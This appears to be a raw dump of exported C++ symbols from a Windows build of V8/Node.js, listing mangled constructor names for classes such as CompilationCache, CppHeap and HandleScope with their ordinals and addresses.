                                                                                                                                                                                                                                    ??0CombinedHeapObjectIterator@internal@v8@@QEAA@PEAVHeap@12@W4HeapObjectsFiltering@HeapObjectIterator@12@@Z4630x140b475f0
                                                                                                                                                                                                                                    ??0CommandLineAPIScope@V8InspectorSession@v8_inspector@@QEAA@AEBV012@@Z4640x1404e3f70
                                                                                                                                                                                                                                    ??0CommandLineAPIScope@V8InspectorSession@v8_inspector@@QEAA@XZ4650x1404e3f70
                                                                                                                                                                                                                                    ??0CommonEnvironmentSetup@node@@AEAA@PEAVMultiIsolatePlatform@1@PEAV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@V?$function@$$A6APEAVEnvironment@node@@PEBVCommonEnvironmentSetup@2@@Z@4@@Z4660x1402a02d0
                                                                                                                                                                                                                                    ??0CommonOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@@Z4670x141036650
                                                                                                                                                                                                                                    ??0CommonOperatorReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z4680x1410919e0
                                                                                                                                                                                                                                    ??0CommonOperatorReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVGraph@123@PEAVJSHeapBroker@123@PEAVCommonOperatorBuilder@123@PEAVMachineOperatorBuilder@123@PEAVZone@23@W4BranchSemantics@123@@Z4690x141127490
                                                                                                                                                                                                                                    ??0CompactionSpace@internal@v8@@QEAA@PEAVHeap@12@W4AllocationSpace@12@W4Executability@12@W4CompactionSpaceKind@12@@Z4700x140536d30
                                                                                                                                                                                                                                    ??0Compactor@internal@cppgc@@QEAA@AEAVRawHeap@12@@Z4710x14051e7f0
                                                                                                                                                                                                                                    ??0CompilationCache@internal@v8@@AEAA@PEAVIsolate@12@@Z4720x140c0b560
                                                                                                                                                                                                                                    ??0CompilationDependencies@compiler@internal@v8@@QEAA@$$QEAV0123@@Z4730x1410134e0
                                                                                                                                                                                                                                    ??0CompilationDependencies@compiler@internal@v8@@QEAA@AEBV0123@@Z4740x141013600
                                                                                                                                                                                                                                    ??0CompilationDependencies@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVZone@23@@Z4750x1410bbfd0
                                                                                                                                                                                                                                    ??0CompilationEventCallback@wasm@internal@v8@@QEAA@AEBV0123@@Z4760x140536de0
                                                                                                                                                                                                                                    ??0CompilationEventCallback@wasm@internal@v8@@QEAA@XZ4770x140536de0
                                                                                                                                                                                                                                    ??0CompilationJob@internal@v8@@QEAA@AEBV012@@Z4780x1406bbc80
                                                                                                                                                                                                                                    ??0CompilationJob@internal@v8@@QEAA@W4State@012@@Z4790x1406bbca0
                                                                                                                                                                                                                                    ??0CompilationResultResolver@wasm@internal@v8@@QEAA@AEBV0123@@Z4800x140617f10
                                                                                                                                                                                                                                    ??0CompilationResultResolver@wasm@internal@v8@@QEAA@XZ4810x140617f10
                                                                                                                                                                                                                                    ??0CompiledWasmModule@v8@@AEAA@V?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@PEBD_K@Z4820x140c766d0
                                                                                                                                                                                                                                    ??0CompiledWasmModule@v8@@QEAA@$$QEAV01@@Z4830x140098530
                                                                                                                                                                                                                                    ??0CompiledWasmModule@v8@@QEAA@AEBV01@@Z4840x140098530
                                                                                                                                                                                                                                    ??0ConcurrentMarker@internal@cppgc@@QEAA@AEAVHeapBase@12@AEAVMarkingWorklists@12@AEAVIncrementalMarkingSchedule@12@PEAVPlatform@2@@Z4850x1405121f0
                                                                                                                                                                                                                                    ??0ConcurrentMarkerBase@internal@cppgc@@QEAA@AEAVHeapBase@12@AEAVMarkingWorklists@12@AEAVIncrementalMarkingSchedule@12@PEAVPlatform@2@@Z4860x14051d990
                                                                                                                                                                                                                                    ??0ConcurrentMarking@internal@v8@@QEAA@PEAVHeap@12@PEAVMarkingWorklists@12@PEAVWeakObjects@12@@Z4870x140b424b0
                                                                                                                                                                                                                                    ??0ConcurrentMarkingVisitor@internal@cppgc@@QEAA@AEAVHeapBase@12@AEAVConcurrentMarkingState@12@@Z4880x14050f1a0
                                                                                                                                                                                                                                    ??0ConcurrentUnifiedHeapMarkingVisitor@internal@v8@@QEAA@AEAVHeapBase@1cppgc@@PEAVHeap@12@AEAVConcurrentMarkingState@14@@Z4890x140b3b1c0
                                                                                                                                                                                                                                    ??0ConditionVariable@base@v8@@QEAA@XZ4900x140ff6410
                                                                                                                                                                                                                                    ??0ConditionalControlFlowBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVAstNode@23@@Z4910x140a32710
                                                                                                                                                                                                                                    ??0Constant@compiler@internal@v8@@QEAA@H@Z4920x14102cc90
                                                                                                                                                                                                                                    ??0Constant@compiler@internal@v8@@QEAA@M@Z4930x14057d9a0
                                                                                                                                                                                                                                    ??0Constant@compiler@internal@v8@@QEAA@N@Z4940x14057d9c0
                                                                                                                                                                                                                                    ??0Constant@compiler@internal@v8@@QEAA@PEBVStringConstantBase@23@@Z4950x14057d9e0
                                                                                                                                                                                                                                    ??0Constant@compiler@internal@v8@@QEAA@V?$Handle@VHeapObject@internal@v8@@@23@_N@Z4960x14057da00
                                                                                                                                                                                                                                    ??0Constant@compiler@internal@v8@@QEAA@VExternalReference@23@@Z4970x14057da20
                                                                                                                                                                                                                                    ??0Constant@compiler@internal@v8@@QEAA@VRelocatablePtrConstantInfo@123@@Z4980x14102ccb0
                                                                                                                                                                                                                                    ??0Constant@compiler@internal@v8@@QEAA@VRpoNumber@123@@Z4990x14057da40
                                                                                                                                                                                                                                    ??0Constant@compiler@internal@v8@@QEAA@_J@Z5000x14057da60
                                                                                                                                                                                                                                    ??0ConstantArrayBuilder@interpreter@internal@v8@@QEAA@$$QEAV0123@@Z5010x140a305f0
                                                                                                                                                                                                                                    ??0ConstantArrayBuilder@interpreter@internal@v8@@QEAA@PEAVZone@23@@Z5020x140a34b10
                                                                                                                                                                                                                                    ??0ConstantFoldingReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z5030x141128f90
                                                                                                                                                                                                                                    ??0ConsumeCodeCacheTask@ScriptCompiler@v8@@AEAA@V?$unique_ptr@VBackgroundDeserializeTask@internal@v8@@U?$default_delete@VBackgroundDeserializeTask@internal@v8@@@std@@@std@@@Z5040x140c76790
                                                                                                                                                                                                                                    ??0ContextDeserializer@internal@v8@@AEAA@PEAVIsolate@12@PEBVSnapshotData@12@_N@Z5050x1407d1a60
                                                                                                                                                                                                                                    ??0ContextSerializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Flags@W4SerializerFlag@Snapshot@internal@v8@@H@base@2@PEAVStartupSerializer@12@USerializeInternalFieldsCallback@2@@Z5060x1407ec0c0
                                                                                                                                                                                                                                    ??0ControlEquivalence@compiler@internal@v8@@QEAA@$$QEAV0123@@Z5070x1411d54f0
                                                                                                                                                                                                                                    ??0ControlEquivalence@compiler@internal@v8@@QEAA@AEBV0123@@Z5080x1411d5550
                                                                                                                                                                                                                                    ??0ControlEquivalence@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVGraph@123@@Z5090x1411d5630
                                                                                                                                                                                                                                    ??0ControlFlowBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@@Z5100x140a32870
                                                                                                                                                                                                                                    ??0ControlFlowOptimizer@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVMachineOperatorBuilder@123@PEAVTickCounter@23@PEAVZone@23@@Z5110x141129410
                                                                                                                                                                                                                                    ??0Coverage@debug@v8@@AEAA@V?$shared_ptr@VCoverage@internal@v8@@@std@@@Z5120x1404e3f00
                                                                                                                                                                                                                                    ??0Coverage@debug@v8@@QEAA@$$QEAV012@@Z5130x1404e3f00
                                                                                                                                                                                                                                    ??0CppHeap@internal@v8@@QEAA@PEAVPlatform@2@AEBV?$vector@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@V?$allocator@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@@2@@std@@AEBUWrapperDescriptor@2@@Z5140x140b3dda0
                                                                                                                                                                                                                                    ??0CppHeap@v8@@AEAA@XZ5150x1404e3f70
                                                                                                                                                                                                                                    ??0CppHeap@v8@@QEAA@AEBV01@@Z5160x1404e3f70
                                                                                                                                                                                                                                    ??0CpuFeatureScope@internal@v8@@QEAA@PEAVAssemblerBase@12@W4CpuFeature@12@W4CheckPolicy@012@@Z5170x1400972c0
                                                                                                                                                                                                                                    ??0CpuProfile@internal@v8@@QEAA@PEAVCpuProfiler@12@IPEBDVCpuProfilingOptions@2@V?$unique_ptr@VDiscardedSamplesDelegate@v8@@U?$default_delete@VDiscardedSamplesDelegate@v8@@@std@@@std@@@Z5180x140864f50
                                                                                                                                                                                                                                    ??0CpuProfileDeoptInfo@v8@@QEAA@$$QEAU01@@Z5190x140098860
                                                                                                                                                                                                                                    ??0CpuProfileDeoptInfo@v8@@QEAA@AEBU01@@Z5200x1400987d0
                                                                                                                                                                                                                                    ??0CpuProfileDeoptInfo@v8@@QEAA@XZ5210x140098750
                                                                                                                                                                                                                                    ??0CpuProfiler@internal@v8@@QEAA@PEAVIsolate@12@W4CpuProfilingNamingMode@2@W4CpuProfilingLoggingMode@2@@Z5220x14087a180
                                                                                                                                                                                                                                    ??0CpuProfiler@internal@v8@@QEAA@PEAVIsolate@12@W4CpuProfilingNamingMode@2@W4CpuProfilingLoggingMode@2@PEAVCpuProfilesCollection@12@PEAVSymbolizer@12@PEAVProfilerEventsProcessor@12@PEAVProfilerCodeObserver@12@@Z5230x14087a260
                                                                                                                                                                                                                                    ??0CpuProfilesCollection@internal@v8@@QEAA@PEAVIsolate@12@@Z5240x140865200
                                                                                                                                                                                                                                    ??0CpuProfilingOptions@v8@@QEAA@$$QEAV01@@Z5250x140098a00
                                                                                                                                                                                                                                    ??0CpuProfilingOptions@v8@@QEAA@AEBV01@@Z5260x140098a00
                                                                                                                                                                                                                                    ??0CpuProfilingOptions@v8@@QEAA@W4CpuProfilingMode@1@IHV?$MaybeLocal@VContext@v8@@@1@@Z5270x140c767e0
                                                                                                                                                                                                                                    ??0CreateParams@Isolate@v8@@QEAA@AEBU012@@Z5280x140098120
                                                                                                                                                                                                                                    ??0CreateParams@Isolate@v8@@QEAA@XZ5290x140c76850
                                                                                                                                                                                                                                    ??0CrossThreadPersistentRegion@internal@cppgc@@QEAA@AEBVFatalOutOfMemoryHandler@12@@Z5300x14050bed0
                                                                                                                                                                                                                                    ??0CsaLoadElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@@Z5310x141091a40
                                                                                                                                                                                                                                    ??0DateCache@internal@v8@@QEAA@AEBV012@@Z5320x140817ce0
                                                                                                                                                                                                                                    ??0DateCache@internal@v8@@QEAA@XZ5330x140bd5b20
                                                                                                                                                                                                                                    ??0DbgStreamBuf@internal@v8@@QEAA@AEBV012@@Z5340x140536df0
                                                                                                                                                                                                                                    ??0DbgStreamBuf@internal@v8@@QEAA@XZ5350x1407bab00
                                                                                                                                                                                                                                    ??0DeadCodeElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVZone@23@@Z5360x1411355c0
                                                                                                                                                                                                                                    ??0Debug@internal@v8@@AEAA@PEAVIsolate@12@@Z5370x140bb6d00
                                                                                                                                                                                                                                    ??0DebugInfo@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z5380x1406551b0
                                                                                                                                                                                                                                    ??0DeclarationScope@internal@v8@@QEAA@$$QEAV012@@Z5390x1407fe320
                                                                                                                                                                                                                                    ??0DeclarationScope@internal@v8@@QEAA@PEAVZone@12@PEAVAstValueFactory@12@W4REPLMode@12@@Z5400x140c61bc0
                                                                                                                                                                                                                                    ??0DeclarationScope@internal@v8@@QEAA@PEAVZone@12@PEAVScope@12@W4ScopeType@12@W4FunctionKind@12@@Z5410x140c61cd0
                                                                                                                                                                                                                                    ??0DeclarationScope@internal@v8@@QEAA@PEAVZone@12@W4ScopeType@12@PEAVAstValueFactory@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z5420x140c61d70
                                                                                                                                                                                                                                    ??0DefaultEmbedderRootsHandler@internal@v8@@QEAA@$$QEAV012@@Z5430x140a97930
                                                                                                                                                                                                                                    ??0DefaultEmbedderRootsHandler@internal@v8@@QEAA@AEBV012@@Z5440x140a97930
                                                                                                                                                                                                                                    ??0DefaultEmbedderRootsHandler@internal@v8@@QEAA@XZ5450x140a97950
                                                                                                                                                                                                                                    ??0Delegate@ValueDeserializer@v8@@QEAA@AEBV012@@Z5460x140098470
                                                                                                                                                                                                                                    ??0Delegate@ValueDeserializer@v8@@QEAA@XZ5470x140098470
                                                                                                                                                                                                                                    ??0Delegate@ValueSerializer@v8@@QEAA@AEBV012@@Z5480x140098460
                                                                                                                                                                                                                                    ??0Delegate@ValueSerializer@v8@@QEAA@XZ5490x140098460
                                                                                                                                                                                                                                    ??0Descriptor@internal@v8@@IEAA@V?$Handle@VName@internal@v8@@@12@AEBVMaybeObjectHandle@12@VPropertyDetails@12@@Z5500x1408f3240
                                                                                                                                                                                                                                    ??0Descriptor@internal@v8@@IEAA@V?$Handle@VName@internal@v8@@@12@AEBVMaybeObjectHandle@12@W4PropertyKind@12@W4PropertyAttributes@12@W4PropertyLocation@12@W4PropertyConstness@12@VRepresentation@12@H@Z5510x1408f3260
                                                                                                                                                                                                                                    ??0Descriptor@internal@v8@@QEAA@XZ5520x1408f32a0
                                                                                                                                                                                                                                    ??0DetachableVectorBase@internal@v8@@QEAA@XZ5530x14009a1b0
                                                                                                                                                                                                                                    ??0DiamondMatcher@compiler@internal@v8@@QEAA@PEAVNode@123@@Z5540x1412495b0
                                                                                                                                                                                                                                    ??0DisallowCompilation@internal@v8@@QEAA@PEAVIsolate@12@@Z5550x140bda810
                                                                                                                                                                                                                                    ??0DisallowDeoptimization@internal@v8@@QEAA@PEAVIsolate@12@@Z5560x140bda830
                                                                                                                                                                                                                                    ??0DisallowExceptions@internal@v8@@QEAA@PEAVIsolate@12@@Z5570x140bda850
                                                                                                                                                                                                                                    ??0DisallowGarbageCollectionScope@subtle@cppgc@@QEAA@AEAVHeapHandle@2@@Z5580x14051aaf0
                                                                                                                                                                                                                                    ??0DisallowJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z5590x140bda870
                                                                                                                                                                                                                                    ??0DisallowJavascriptExecutionScope@Isolate@v8@@QEAA@PEAV12@W4OnFailure@012@@Z5600x140c768c0
                                                                                                                                                                                                                                    ??0DiscardedSamplesDelegate@v8@@QEAA@AEBV01@@Z5610x140098990
                                                                                                                                                                                                                                    ??0DiscardedSamplesDelegate@v8@@QEAA@XZ5620x140098980
                                                                                                                                                                                                                                    ??0DisjointAllocationPool@wasm@internal@v8@@QEAA@$$QEAV0123@@Z5630x140536e90
                                                                                                                                                                                                                                    ??0DisjointAllocationPool@wasm@internal@v8@@QEAA@VAddressRegion@base@3@@Z5640x140536ef0
                                                                                                                                                                                                                                    ??0DisjointAllocationPool@wasm@internal@v8@@QEAA@XZ5650x14050cfe0
                                                                                                                                                                                                                                    ??0Domain@API@Schema@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z5660x1404e3f80
                                                                                                                                                                                                                                    ??0Domain@API@Schema@protocol@v8_inspector@@QEAA@AEBV01234@@Z5670x1404e3f80
                                                                                                                                                                                                                                    ??0Domain@API@Schema@protocol@v8_inspector@@QEAA@XZ5680x1404e3f80
                                                                                                                                                                                                                                    ??0DumpOnJavascriptExecution@internal@v8@@QEAA@PEAVIsolate@12@@Z5690x140bda890
                                                                                                                                                                                                                                    ??0EhFrameIterator@internal@v8@@QEAA@PEBE0@Z5700x1400cf990
                                                                                                                                                                                                                                    ??0EhFrameWriter@internal@v8@@QEAA@PEAVZone@12@@Z5710x140b9b010
                                                                                                                                                                                                                                    ??0EmbedderGraph@v8@@QEAA@AEBV01@@Z5720x140098b10
                                                                                                                                                                                                                                    ??0EmbedderGraph@v8@@QEAA@XZ5730x140098b10
                                                                                                                                                                                                                                    ??0EmbedderHeapTracer@v8@@QEAA@AEBV01@@Z5740x140097de0
                                                                                                                                                                                                                                    ??0EmbedderHeapTracer@v8@@QEAA@XZ5750x140097dc0
                                                                                                                                                                                                                                    ??0EmbedderRootsHandler@v8@@QEAA@AEBV01@@Z5760x140097db0
                                                                                                                                                                                                                                    ??0EmbedderRootsHandler@v8@@QEAA@XZ5770x140097db0
                                                                                                                                                                                                                                    ??0EmbedderStackStateScope@internal@v8@@AEAA@PEAVLocalEmbedderHeapTracer@12@W4EmbedderStackState@cppgc@@@Z5780x140afca50
                                                                                                                                                                                                                                    ??0EmbedderStackStateScope@internal@v8@@QEAA@PEAVHeap@12@W4Origin@012@W4EmbedderStackState@cppgc@@@Z5790x140afca80
                                                                                                                                                                                                                                    ??0EmbedderState@internal@v8@@QEAA@PEAVIsolate@2@V?$Local@VContext@v8@@@2@W4EmbedderStateTag@2@@Z5800x140b81ce0
                                                                                                                                                                                                                                    ??0EmbedderStateScope@v8@@QEAA@PEAVIsolate@1@V?$Local@VContext@v8@@@1@W4EmbedderStateTag@1@@Z5810x140c76930
                                                                                                                                                                                                                                    ??0Entry@TypeProfile@debug@v8@@AEAA@PEBUTypeProfileEntry@internal@3@V?$shared_ptr@VTypeProfile@internal@v8@@@std@@@Z5820x140536a90
                                                                                                                                                                                                                                    ??0Entry@TypeProfile@debug@v8@@QEAA@$$QEAV0123@@Z5830x140536ac0
                                                                                                                                                                                                                                    ??0EphemeronHashTable@internal@v8@@IEAA@_K@Z5840x140097ad0
                                                                                                                                                                                                                                    ??0EphemeronHashTable@internal@v8@@QEAA@XZ5850x14010d5b0
                                                                                                                                                                                                                                    ??0ErrorThrower@wasm@internal@v8@@QEAA@$$QEAV0123@@Z5860x14061fce0
                                                                                                                                                                                                                                    ??0ErrorThrower@wasm@internal@v8@@QEAA@PEAVIsolate@23@PEBD@Z5870x140617f20
                                                                                                                                                                                                                                    ??0EscapableHandleScope@v8@@QEAA@PEAVIsolate@1@@Z5880x140c769a0
                                                                                                                                                                                                                                    ??0EscapeAnalysis@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVTickCounter@23@PEAVZone@23@@Z5890x1411549e0
                                                                                                                                                                                                                                    ??0EscapeAnalysisReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@VEscapeAnalysisResult@123@PEAVZone@23@@Z5900x141159db0
                                                                                                                                                                                                                                    ??0Event@StatsCollector@internal@cppgc@@QEAA@XZ5910x1405091f0
                                                                                                                                                                                                                                    ??0Exported@protocol@v8_inspector@@QEAA@AEBV012@@Z5920x1404e3f80
                                                                                                                                                                                                                                    ??0Exported@protocol@v8_inspector@@QEAA@XZ5930x1404e3f80
                                                                                                                                                                                                                                    ??0Extension@v8@@QEAA@PEBD0HPEAPEBDH@Z5940x140c76a10
                                                                                                                                                                                                                                    ??0ExtensionConfiguration@v8@@QEAA@HQEAPEBD@Z5950x1400978c0
                                                                                                                                                                                                                                    ??0ExtensionConfiguration@v8@@QEAA@XZ5960x1400978b0
                                                                                                                                                                                                                                    ??0ExternalMarkingWorklist@MarkingWorklists@internal@cppgc@@QEAA@XZ5970x140512220
                                                                                                                                                                                                                                    ??0ExternalOneByteStringResource@String@v8@@IEAA@XZ5980x1400975a0
                                                                                                                                                                                                                                    ??0ExternalResourceVisitor@v8@@QEAA@AEBV01@@Z5990x1400972b0
                                                                                                                                                                                                                                    ??0ExternalResourceVisitor@v8@@QEAA@XZ6000x1400972b0
                                                                                                                                                                                                                                    ??0ExternalSourceStream@ScriptCompiler@v8@@QEAA@AEBV012@@Z6010x140097ae0
                                                                                                                                                                                                                                    ??0ExternalSourceStream@ScriptCompiler@v8@@QEAA@XZ6020x140097ae0
                                                                                                                                                                                                                                    ??0ExternalStringResource@String@v8@@IEAA@XZ6030x1400975a0
                                                                                                                                                                                                                                    ??0ExternalStringResourceBase@String@v8@@IEAA@XZ6040x140097590
                                                                                                                                                                                                                                    ??0FatalOutOfMemoryHandler@internal@cppgc@@QEAA@PEAVHeapBase@12@@Z6050x14051ac10
                                                                                                                                                                                                                                    ??0FatalOutOfMemoryHandler@internal@cppgc@@QEAA@XZ6060x140097c90
                                                                                                                                                                                                                                    ??0FeedbackIterator@internal@v8@@QEAA@PEBVFeedbackNexus@12@@Z6070x1409a89a0
                                                                                                                                                                                                                                    ??0FeedbackNexus@internal@v8@@QEAA@V?$Handle@VFeedbackVector@internal@v8@@@12@VFeedbackSlot@12@@Z6080x1409a8ac0
                                                                                                                                                                                                                                    ??0FeedbackNexus@internal@v8@@QEAA@V?$Handle@VFeedbackVector@internal@v8@@@12@VFeedbackSlot@12@AEBVNexusConfig@12@@Z6090x1409a8b50
                                                                                                                                                                                                                                    ??0FeedbackNexus@internal@v8@@QEAA@VFeedbackVector@12@VFeedbackSlot@12@@Z6100x1409a8bc0
                                                                                                                                                                                                                                    ??0FeedbackSource@compiler@internal@v8@@QEAA@V?$Handle@VFeedbackVector@internal@v8@@@23@VFeedbackSlot@23@@Z6110x14057daa0
                                                                                                                                                                                                                                    ??0FeedbackVectorSpec@internal@v8@@QEAA@$$QEAV012@@Z6120x140537000
                                                                                                                                                                                                                                    ??0FeedbackVectorSpec@internal@v8@@QEAA@AEBV012@@Z6130x140537040
                                                                                                                                                                                                                                    ??0FeedbackVectorSpec@internal@v8@@QEAA@PEAVZone@12@@Z6140x140537110
                                                                                                                                                                                                                                    ??0FlatStringReader@internal@v8@@QEAA@$$QEAV012@@Z6150x1405371c0
                                                                                                                                                                                                                                    ??0FlatStringReader@internal@v8@@QEAA@AEBV012@@Z6160x1405371c0
                                                                                                                                                                                                                                    ??0FlatStringReader@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VString@internal@v8@@@12@@Z6170x1408db4e0
                                                                                                                                                                                                                                    ??0Frame@compiler@internal@v8@@QEAA@H@Z6180x141069310
                                                                                                                                                                                                                                    ??0FrameSummary@internal@v8@@QEAA@VJavaScriptFrameSummary@012@@Z6190x140537210
                                                                                                                                                                                                                                    ??0FrameSummary@internal@v8@@QEAA@VWasmFrameSummary@012@@Z6200x140537240
                                                                                                                                                                                                                                    ??0FreeList@internal@cppgc@@QEAA@$$QEAV012@@Z6210x14051c7b0
                                                                                                                                                                                                                                    ??0FreeList@internal@cppgc@@QEAA@XZ6220x14051c8b0
                                                                                                                                                                                                                                    ??0FreeListMany@internal@v8@@QEAA@XZ6230x140b1ea40
                                                                                                                                                                                                                                    ??0FreeListManyCached@internal@v8@@QEAA@XZ6240x140b1ead0
                                                                                                                                                                                                                                    ??0FreeListManyCachedFastPath@internal@v8@@QEAA@XZ6250x140537260
                                                                                                                                                                                                                                    ??0FreeListManyCachedOrigin@internal@v8@@QEAA@XZ6260x140537290
                                                                                                                                                                                                                                    ??0FunctionData@Coverage@debug@v8@@AEAA@PEAUCoverageFunction@internal@3@V?$shared_ptr@VCoverage@internal@v8@@@std@@@Z6270x140536a90
                                                                                                                                                                                                                                    ??0FunctionData@Coverage@debug@v8@@QEAA@$$QEAV0123@@Z6280x140536ac0
                                                                                                                                                                                                                                    ??0FunctionTargetAndRef@internal@v8@@QEAA@V?$Handle@VWasmInstanceObject@internal@v8@@@12@H@Z6290x1406234f0
                                                                                                                                                                                                                                    ??0GCInfoTable@internal@cppgc@@QEAA@PEAVPageAllocator@v8@@@Z6300x14051c290
                                                                                                                                                                                                                                    ??0GCInvoker@internal@cppgc@@QEAA@PEAVGarbageCollector@12@PEAVPlatform@2@W4StackSupport@Heap@2@@Z6310x14051b8d0
                                                                                                                                                                                                                                    ??0GCTracer@internal@v8@@QEAA@PEAVHeap@12@@Z6320x140b19860
                                                                                                                                                                                                                                    ??0GlobalDictionary@internal@v8@@IEAA@_K@Z6330x140097ad0
                                                                                                                                                                                                                                    ??0GlobalDictionary@internal@v8@@QEAA@XZ6340x14010d5b0
                                                                                                                                                                                                                                    ??0GlobalHandles@internal@v8@@QEAA@PEAVIsolate@12@@Z6350x140b4bb90
                                                                                                                                                                                                                                    ??0GlobalSafepointScope@internal@v8@@QEAA@PEAVIsolate@12@@Z6360x140aa8aa0
                                                                                                                                                                                                                                    ??0Graph@compiler@internal@v8@@QEAA@PEAVZone@23@@Z6370x1410dd820
                                                                                                                                                                                                                                    ??0GraphAssembler@compiler@internal@v8@@QEAA@AEBV0123@@Z6380x141070940
                                                                                                                                                                                                                                    ??0GraphAssembler@compiler@internal@v8@@QEAA@PEAVMachineGraph@123@PEAVZone@23@V?$Optional@V?$function@$$A6AXPEAVNode@compiler@internal@v8@@@Z@std@@@base@3@_N@Z6390x1410e1150
                                                                                                                                                                                                                                    ??0GraphReducer@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVGraph@123@PEAVTickCounter@23@PEAVJSHeapBroker@123@PEAVNode@123@PEAVObserveNodeManager@123@@Z6400x1410c8150
                                                                                                                                                                                                                                    ??0GraphTrimmer@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVGraph@123@@Z6410x14115c320
                                                                                                                                                                                                                                    ??0HandleScope@v8@@QEAA@PEAVIsolate@1@@Z6420x140c76ad0
                                                                                                                                                                                                                                    ??0HandlerTable@internal@v8@@QEAA@PEBVWasmCode@wasm@12@@Z6430x140bf9720
                                                                                                                                                                                                                                    ??0HandlerTable@internal@v8@@QEAA@VByteArray@12@@Z6440x140bf9780
                                                                                                                                                                                                                                    ??0HandlerTable@internal@v8@@QEAA@VBytecodeArray@12@@Z6450x140bf97b0
                                                                                                                                                                                                                                    ??0HandlerTable@internal@v8@@QEAA@VCode@12@@Z6460x140bf97e0
                                                                                                                                                                                                                                    ??0HandlerTable@internal@v8@@QEAA@_KHW4EncodingMode@012@@Z6470x140bf9850
                                                                                                                                                                                                                                    ??0HandlerTableBuilder@interpreter@internal@v8@@QEAA@PEAVZone@23@@Z6480x14057d300
                                                                                                                                                                                                                                    ??0HashTableBase@internal@v8@@IEAA@_K@Z6490x140097ad0
                                                                                                                                                                                                                                    ??0HashTableBase@internal@v8@@QEAA@XZ6500x14010d5b0
                                                                                                                                                                                                                                    ??0Heap@cppgc@@AEAA@XZ6510x1404e3f70
                                                                                                                                                                                                                                    ??0Heap@cppgc@@QEAA@AEBV01@@Z6520x1404e3f70
                                                                                                                                                                                                                                    ??0Heap@internal@cppgc@@QEAA@V?$shared_ptr@VPlatform@cppgc@@@std@@UHeapOptions@02@@Z6530x1405173c0
                                                                                                                                                                                                                                    ??0HeapAllocator@internal@v8@@QEAA@PEAVHeap@12@@Z6540x140097ad0
                                                                                                                                                                                                                                    ??0HeapBase@internal@cppgc@@QEAA@V?$shared_ptr@VPlatform@cppgc@@@std@@AEBV?$vector@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@V?$allocator@V?$unique_ptr@VCustomSpaceBase@cppgc@@U?$default_delete@VCustomSpaceBase@cppgc@@@std@@@std@@@2@@4@W4StackSupport@Heap@2@W4MarkingType@72@W4SweepingType@72@@Z6550x14051ac20
                                                                                                                                                                                                                                    ??0HeapCodeStatistics@v8@@QEAA@XZ6560x140537580
                                                                                                                                                                                                                                    ??0HeapConstantType@compiler@internal@v8@@AEAA@_KAEBVHeapObjectRef@123@@Z6570x141027210
                                                                                                                                                                                                                                    ??0HeapGrowing@internal@cppgc@@QEAA@PEAVGarbageCollector@12@PEAVStatsCollector@12@UResourceConstraints@Heap@2@W4MarkingType@62@W4SweepingType@62@@Z6580x14051a6d0
                                                                                                                                                                                                                                    ??0HeapObjectIterator@internal@v8@@QEAA@PEAVHeap@12@W4HeapObjectsFiltering@012@@Z6590x140afd160
                                                                                                                                                                                                                                    ??0HeapObjectStatistics@v8@@QEAA@XZ6600x140537580
                                                                                                                                                                                                                                    ??0HeapSpaceStatistics@v8@@QEAA@XZ6610x140c76af0
                                                                                                                                                                                                                                    ??0HeapStatistics@v8@@QEAA@XZ6620x140c76b10
                                                                                                                                                                                                                                    ??0HiddenLocalFactory@internal@v8@@QEAA@PEAVIsolate@12@@Z6630x1405372c0
                                                                                                                                                                                                                                    ??0I32PairToBigIntDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z6640x14057d2a0
                                                                                                                                                                                                                                    ??0I32PairToBigIntDescriptor@internal@v8@@QEAA@XZ6650x14057da80
                                                                                                                                                                                                                                    ??0I64ToBigIntDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z6660x14057d2a0
                                                                                                                                                                                                                                    ??0I64ToBigIntDescriptor@internal@v8@@QEAA@XZ6670x14057da90
                                                                                                                                                                                                                                    ??0IdentityMapBase@internal@v8@@IEAA@PEAVHeap@12@@Z6680x1405372e0
                                                                                                                                                                                                                                    ??0IncrementalMarking@internal@v8@@QEAA@PEAVHeap@12@PEAVWeakObjects@12@@Z6690x140af5010
                                                                                                                                                                                                                                    ??0IncrementalMarkingSchedule@internal@cppgc@@QEAA@XZ6700x140512240
                                                                                                                                                                                                                                    ??0IndexGenerator@internal@v8@@QEAA@_K@Z6710x140af4970
                                                                                                                                                                                                                                    ??0Inputs@Node@compiler@internal@v8@@QEAA@PEBQEAV1234@H@Z6720x14057daa0
